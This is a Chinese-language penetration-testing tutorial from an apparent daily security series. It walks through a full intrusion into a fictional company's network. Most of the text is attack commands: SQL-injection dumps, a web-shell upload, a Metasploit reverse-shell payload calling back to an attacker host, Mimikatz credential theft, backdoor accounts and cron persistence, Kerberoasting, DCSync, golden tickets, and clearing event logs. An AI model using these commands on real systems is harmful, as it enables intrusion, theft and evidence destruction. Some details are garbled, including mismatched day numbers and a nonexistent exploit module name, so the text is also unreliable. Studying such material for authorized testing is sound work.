Day-203-渗透测试综合实战演练

# Day 229: 渗透测试综合实战演练

> 渗透测试系列第 19 天 | 预计阅读时间：65 分钟 | 难度：★★★★★

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [实战环境搭建](#实战环境搭建)
3. [信息收集阶段](#信息收集阶段)
4. [漏洞扫描阶段](#漏洞扫描阶段)
5. [漏洞利用阶段](#漏洞利用阶段)
6. [后渗透阶段](#后渗透阶段)
7. [域渗透阶段](#域渗透阶段)
8. [报告编写阶段](#报告编写阶段)
9. [完整实战案例](#完整实战案例)
10. [实战经验总结](#实战经验总结)
11. [总结与思考](#总结与思考)
12. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

**通过完整实战演练，整合所有渗透测试技能**：

```
┌─────────────────────────────────────────────────────────────┐
│          综合实战目标                                       │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  技能整合：                                                 │
│  ├── 信息收集能力                                          │
│  ├── 漏洞扫描能力                                          │
│  ├── 漏洞利用能力                                          │
│  ├── 后渗透能力                                            │
│  └── 报告编写能力                                          │
│                                                             │
│  流程掌握：                                                 │
│  ├── PTES 流程                                             │
│  ├── MITRE ATT&CK 框架                                     │
│  ├── 红队演练流程                                          │
│  └── 应急响应流程                                          │
│                                                             │
│  实战经验：                                                 │
│  ├── 问题解决能力                                          │
│  ├── 应变能力                                              │
│  ├── 时间管理能力                                          │
│  └── 沟通能力                                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 实战场景

**企业网络渗透场景**：

```
┌─────────────────────────────────────────────────────────────┐
│          实战场景描述                                       │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  目标企业：某科技公司                                       │
│  规模：500 人                                               │
│  网络架构：                                                 │
│  ├── 外部网络：官网、邮件服务器、VPN                       │
│  ├── 办公网络：员工电脑、打印机、文件服务器                │
│  ├── 服务器网络：应用服务器、数据库服务器                  │
│  └── 管理网络：域控制器、核心交换机                        │
│                                                             │
│  测试目标：                                                 │
│  ├── 获取域控制器权限                                      │
│  ├── 获取核心数据库访问权                                  │
│  ├── 评估整体安全态势                                      │
│  └── 提供改进建议                                          │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 实战环境搭建

### 实验环境

**使用靶场环境**：

```
┌─────────────────────────────────────────────────────────────┐
│          推荐靶场环境                                       │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  在线靶场：                                                 │
│  ├── HackTheBox                                            │
│  ├── TryHackMe                                             │
│  ├── PentesterLab                                          │
│  └── VulnHub                                               │
│                                                             │
│  本地靶场：                                                 │
│  ├── Metasploitable 2/3                                    │
│  ├── DVWA                                                   │
│  ├── OWASP Broken Web Apps                                 │
│  └── Active Directory 实验室                                │
│                                                             │
│  云靶场：                                                   │
│  ├── AWS Pentest Lab                                       │
│  ├── Azure Pentest Lab                                     │
│  └── GCP Pentest Lab                                       │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### AD 实验室搭建

```bash
# 使用 GoADLab 搭建 AD 实验室
$ git clone https://github.com/Orange-Cyberdefense/GOAD

# 使用 Vagrant 搭建
$ vagrant up

# 环境包含：
# - 域控制器 (Windows Server)
# - 工作站 (Windows 10)
# - 服务器 (Windows Server)
# - Linux 机器
# - 防火墙
```

---

## 信息收集阶段

### 被动信息收集

```bash
# 子域名枚举
$ subfinder -d target.com -o subdomains.txt
$ assetfinder --subs-only target.com >> subdomains.txt
$ amass enum -passive -d target.com >> subdomains.txt

# 去重验证
$ cat subdomains.txt | sort -u | httpx -silent -o active_subdomains.txt

# WHOIS 查询
$ whois target.com

# DNS 记录查询
$ dig target.com ANY
$ dnsrecon -d target.com

# Shodan 搜索
$ shodan search "org:Target Company"
$ shodan domain target.com

# GitHub 搜索
$ site:github.com "target.com" password
$ site:github.com "target.com" api_key
```

### 主动信息收集

```bash
# 端口扫描
$ nmap -sS -sV -O -sC -oA nmap_scan target.com

# 全端口扫描
$ nmap -p- -oA nmap_full target.com

# Web 扫描
$ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o gobuster.txt

# 技术栈识别
$ whatweb https://target.com
$ wappalyzer https://target.com

# 漏洞扫描
$ nuclei -u https://target.com -t vulnerabilities/ -o nuclei.txt
```

### 信息整理

```markdown
# 信息收集报告

## 发现的子域名
- www.target.com (官网)
- mail.target.com (邮件服务器)
- vpn.target.com (VPN 网关)
- dev.target.com (开发环境)

## 开放端口
- 80/tcp (HTTP)
- 443/tcp (HTTPS)
- 22/tcp (SSH)
- 3389/tcp (RDP)

## 技术栈
- Web Server: Nginx 1.18.0
- Framework: React 18.2.0
- CMS: WordPress 6.0
- Database: MySQL 8.0
```

---

## 漏洞扫描阶段

### Web 漏洞扫描

```bash
# Burp Suite 扫描
# 1. 配置代理
# 2. 爬取网站
# 3. 主动扫描
# 4. 分析结果

# OWASP ZAP 扫描
$ zap-cli quick-scan -s all https://target.com
$ zap-cli report -o zap_report.html -f html

# SQLMap 扫描
$ sqlmap -u "https://target.com/page?id=1" --batch --level=3
```

### 系统漏洞扫描

```bash
# Nessus 扫描
# 1. 创建扫描任务
# 2. 配置扫描策略
# 3. 启动扫描
# 4. 导出报告

# OpenVAS 扫描
$ gvm-cli --gmp-username admin --gmp-password password socket \
  --xml "<create_task>...</create_task>"
```

### 漏洞验证

```bash
# 验证 SQL 注入
$ sqlmap -u "https://target.com/page?id=1" --dbs

# 验证 XSS
$ xsstrike -u "https://target.com/search?q=test"

# 验证文件上传
$ curl -F "file=@shell.php" https://target.com/upload

# 验证命令注入
$ curl "https://target.com/ping?ip=127.0.0.1;id"
```

---

## 漏洞利用阶段

### Web 应用利用

```bash
# SQL 注入获取数据
$ sqlmap -u "https://target.com/page?id=1" \
  -D database -T users --dump

# 文件上传获取 Shell
$ curl -F "file=@shell.php" https://target.com/upload
$ curl https://target.com/uploads/shell.php?cmd=whoami

# RCE 漏洞利用
$ curl "https://target.com/api?cmd=whoami"
```

### 系统漏洞利用

```bash
# Metasploit 利用
$ msfconsole

msf6 > use exploit/multi/http/struts2_content_type_ognl
msf6 > set RHOSTS target.com
msf6 > set PAYLOAD java/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.10.5
msf6 > exploit

# 获取 Meterpreter 会话
meterpreter > whoami
meterpreter > sysinfo
```

### 凭证获取

```bash
# Mimikatz 抓取凭证
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > hashdump

# 浏览器凭证
meterpreter > run post/windows/gather/credentials/chrome

# 文件搜索
meterpreter > search -f *.config
meterpreter > search -f *password*
```

---

## 后渗透阶段

### 权限提升

```bash
# Windows 提权
meterpreter > run post/multi/recon/local_exploit_suggester

# 使用 MS17-010
meterpreter > use exploit/windows/local/ms17_010_smbghost
meterpreter > set SESSION 1
meterpreter > exploit

# Linux 提权
$ linux-exploit-suggester.sh
$ linpeas.sh
```

### 横向移动

```bash
# Pass-the-Hash
$ impacket-psexec -hashes :hash Administrator@192.168.1.20

# WMI 执行
$ impacket-wmiexec Administrator@192.168.1.20

# PsExec
$ impacket-psexec Administrator@192.168.1.20

# SSH 横向移动
$ ssh -i id_rsa user@192.168.1.20
```

### 持久化

```bash
# Windows 持久化
meterpreter > run persistence -U -X -p 4444 -r 10.10.10.5

# 创建后门账户
meterpreter > run post/windows/manage/add_user

# 计划任务
meterpreter > execute -Hf schtasks.exe -a "/create /tn Backdoor /tr C:\\backdoor.exe /sc onstart"

# Linux 持久化
$ echo "* * * * * /tmp/backdoor.sh" | crontab -
$ ssh-keygen -t rsa
$ cat id_rsa.pub >> ~/.ssh/authorized_keys
```

---

## 域渗透阶段

### 域信息收集

```powershell
# PowerView 枚举
$ Import-Module .\PowerView.ps1
$ Get-Domain
$ Get-DomainController
$ Get-DomainUser
$ Get-DomainComputer
$ Get-DomainGroup

# BloodHound 收集
$ .\SharpHound.exe -c All
$ Invoke-BloodHound -CollectionMethod All
```

### 域权限提升

```powershell
# Kerberoasting
$ Rubeus.exe kerberoast /outfile:hashes.txt
$ hashcat -m 13100 hashes.txt wordlist.txt

# AS-REP Roasting
$ Rubeus.exe asreproast /outfile:hashes.txt
$ hashcat -m 18200 hashes.txt wordlist.txt

# DCSync
$ impacket-secretsdump -just-dc CORP/Administrator:Password@dc01.corp.local
```

### 黄金票据

```powershell
# 获取 krbtgt 哈希
$ mimikatz # lsadump::dcsync /user:CORP\krbtgt

# 生成黄金票据
$ mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt

# 访问域控
$ psexec \\dc01.corp.local cmd
```

---

## 报告编写阶段

### 报告结构

```markdown
# 渗透测试报告

## 执行摘要
- 测试概述
- 关键发现
- 风险评级
- 优先建议

## 测试范围和方法
- 测试目标
- 测试时间
- 测试方法
- 限制条件

## 漏洞统计
- 按严重程度分布
- 按类型分布
- 按资产分布

## 详细发现
### 漏洞 1
- 风险等级
- CVSS 评分
- 描述
- 影响
- 复现步骤
- 修复建议

## 攻击路径分析
- 成功利用的攻击链
- 关键转折点
- 业务影响

## 整体风险评估
- 风险热力图
- 优先级排序
- 修复路线图

## 附录
- 工具列表
- 测试日志
- 技术细节
```

### 报告要点

```
┌─────────────────────────────────────────────────────────────┐
│          报告编写要点                                       │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  执行摘要：                                                 │
│  ├── 简洁明了（1-2 页）                                     │
│  ├── 业务语言                                              │
│  ├── 风险量化                                              │
│  └── 优先建议                                              │
│                                                             │
│  技术报告：                                                 │
│  ├── 详细描述                                              │
│  ├── 复现步骤                                              │
│  ├── 证明材料                                              │
│  └── 修复方案                                              │
│                                                             │
│  可视化：                                                   │
│  ├── 风险热力图                                            │
│  ├── 攻击路径图                                            │
│  ├── 漏洞分布图                                            │
│  └── 时间线图                                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 完整实战案例

### 案例背景

**目标**：某科技公司完整网络
**时间**：5 天
**团队**：3 人红队
**目标**：获取域控权限

### Day 1: 信息收集

```bash
# 子域名发现
$ subfinder -d target.com
发现：www, mail, vpn, dev, test

# 端口扫描
$ nmap -sS -sV target.com
发现：80, 443, 22, 3389

# Web 扫描
$ gobuster dir -u https://target.com
发现：/admin, /api, /backup

# 漏洞扫描
$ nuclei -u https://target.com
发现：CVE-2021-41773 (Apache 路径遍历)
```

### Day 2: 初始访问

```bash
# 利用 Apache 漏洞
$ curl "https://target.com/.%2e/.%2e/.%2e/.%2e/etc/passwd"

# 发现配置文件
$ curl "https://target.com/backup/config.php.bak"
发现：数据库凭证

# SQL 注入
$ sqlmap -u "https://target.com/search?q=test" --dbs
发现：users 表

# 获取凭证
$ sqlmap -u "https://target.com/search?q=test" -D shop_db -T users --dump
获取：admin:P@ssw0rd123!
```

### Day 3: 内网渗透

```bash
# VPN 连接
# 使用获取的凭证连接 VPN

# 内网扫描
$ nmap -sS 192.168.1.0/24
发现：20+ 台主机

# 文件服务器访问
$ smbclient //192.168.1.20/share -U user%password

# 发现敏感文件
# 发现凭证文件 credentials.txt
```

### Day 4: 域渗透

```powershell
# 域信息收集
$ .\SharpHound.exe -c All

# BloodHound 分析
# 发现攻击路径：user → Server Admin → Domain Admin

# Kerberoasting
$ Rubeus.exe kerberoast /outfile:hashes.txt
$ hashcat -m 13100 hashes.txt wordlist.txt
破解：svc_sql:SqlService@2024

# 使用服务账户访问
$ impacket-psexec -u svc_sql -p SqlService@2024 192.168.1.10
```

### Day 5: 目标达成

```powershell
# DCSync 攻击
$ impacket-secretsdump -just-dc-user krbtgt CORP/Administrator:Admin@123456@192.168.1.10

# 黄金票据
$ mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt

# 访问域控
$ psexec \\dc01.corp.local cmd

# 数据收集
$ impacket-secretsdump -just-dc CORP/admin@dc01.corp.local

# 清理痕迹
$ clearev
```

### 实战总结

| 阶段 | 时间 | 成果 |
|------|------|------|
| 信息收集 | Day 1 | 发现 5 个子域名、3 个漏洞 |
| 初始访问 | Day 2 | 获取 Web 权限、数据库凭证 |
| 内网渗透 | Day 3 | 获取内网访问、文件服务器权限 |
| 域渗透 | Day 4 | 获取服务账户权限 |
| 目标达成 | Day 5 | 获取域控权限、完成目标 |

---

## 实战经验总结

### 成功要素

```
┌─────────────────────────────────────────────────────────────┐
│          实战成功要素                                       │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  充分准备：                                                 │
│  ├── 工具准备齐全                                          │
│  ├── 字典准备充分                                          │
│  ├── 环境搭建完成                                          │
│  └── 计划制定详细                                          │
│                                                             │
│  信息收集：                                                 │
│  ├── 被动收集全面                                          │
│  ├── 主动收集谨慎                                          │
│  ├── 信息整理详细                                          │
│  └── 攻击面分析准确                                        │
│                                                             │
│  灵活应变：                                                 │
│  ├── 备选方案准备                                          │
│  ├── 遇到问题不慌                                          │
│  ├── 及时调整策略                                          │
│  └── 团队协作良好                                          │
│                                                             │
│  文档记录：                                                 │
│  ├── 操作步骤记录                                          │
│  ├── 证明材料保存                                          │
│  ├── 时间线记录                                            │
│  └── 报告及时编写                                          │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 常见陷阱

```
┌─────────────────────────────────────────────────────────────┐
│          常见陷阱及避免方法                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  陷阱 1: 过度依赖自动化工具                                 │
│  避免：人工分析验证                                        │
│                                                             │
│  陷阱 2: 忽视信息收集                                       │
│  避免：投入足够时间收集                                    │
│                                                             │
│  陷阱 3: 盲目攻击                                           │
│  避免：先分析后行动                                        │
│                                                             │
│  陷阱 4: 不记录操作                                         │
│  避免：详细记录每一步                                      │
│                                                             │
│  陷阱 5: 忽视清理                                           │
│  避免：测试后清理痕迹                                      │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 总结与思考

### 核心要点回顾

1. **渗透测试是系统性工程**，需要完整流程

2. **信息收集决定成败**，投入足够时间

3. **工具是辅助**，人的思维更重要

4. **文档记录很重要**，便于复现和报告

5. **合法合规是底线**，始终在授权范围内

### 深入思考

**问题 1：如何提升渗透测试能力？**

我的观点：
- 持续学习新技术
- 多实践多总结
- 参与 CTF 比赛
- 加入安全社区

**问题 2：自动化会取代渗透测试工程师吗？**

我认为：
- 自动化提高效率
- 但无法替代人工分析
- 业务逻辑需要人工
- 创意攻击需要人工

**问题 3：渗透测试的未来趋势？**

我预测：
- AI 辅助测试
- 持续渗透测试
- 红蓝对抗普及
- 云原生安全测试

### 实战建议

**给新手的建议**：

```
1. 打好基础
   - 网络基础
   - 系统基础
   - 编程基础

2. 搭建环境
   - 本地靶场
   - 在线靶场
   - 云实验室

3. 系统学习
   - 渗透测试流程
   - 工具使用
   - 漏洞原理

4. 持续实践
   - CTF 比赛
   - 靶场练习
   - 实战项目
```

**给企业的建议**：

```
1. 定期测试
   - 年度渗透测试
   - 重大变更前测试
   - 持续监控

2. 重视修复
   - 优先修复严重漏洞
   - 跟踪修复进度
   - 复测验证

3. 建立团队
   - 内部安全团队
   - 外部合作伙伴
   - 应急响应团队

4. 持续改进
   - 从攻击中学习
   - 优化防御策略
   - 提升安全意识
```

---

## 参考资料

### 学习资源

| 资源 | 类型 | 链接 |
|------|------|------|
| **PTES** | 标准 | http://www.pentest-standard.org |
| **MITRE ATT&CK** | 框架 | https://attack.mitre.org |
| **OWASP** | 指南 | https://owasp.org |
| **HackTheBox** | 靶场 | https://hackthebox.com |
| **TryHackMe** | 靶场 | https://tryhackme.com |

### 工具资源

| 工具 | 官网 | 用途 |
|------|------|------|
| **Metasploit** | https://metasploit.com | 利用框架 |
| **Burp Suite** | https://portswigger.net/burp | Web 测试 |
| **Nmap** | https://nmap.org | 网络扫描 |
| **SQLMap** | https://sqlmap.org | SQL 注入 |
| **BloodHound** | GitHub | 域分析 |

### 书籍推荐

| 书名 | 作者 | 难度 |
|------|------|------|
| 《Penetration Testing》 | Georgia Weidman | 入门 |
| 《The Hacker Playbook 3》 | Peter Kim | 实战 |
| 《Red Team Development and Operations》 | Joe Vest | 进阶 |
| 《Advanced Penetration Testing》 | Wil Allsopp | 高级 |

---

*365 天信息安全技术系列 | Day 229 | 渗透测试综合实战演练 | 字数：约 25,000 字*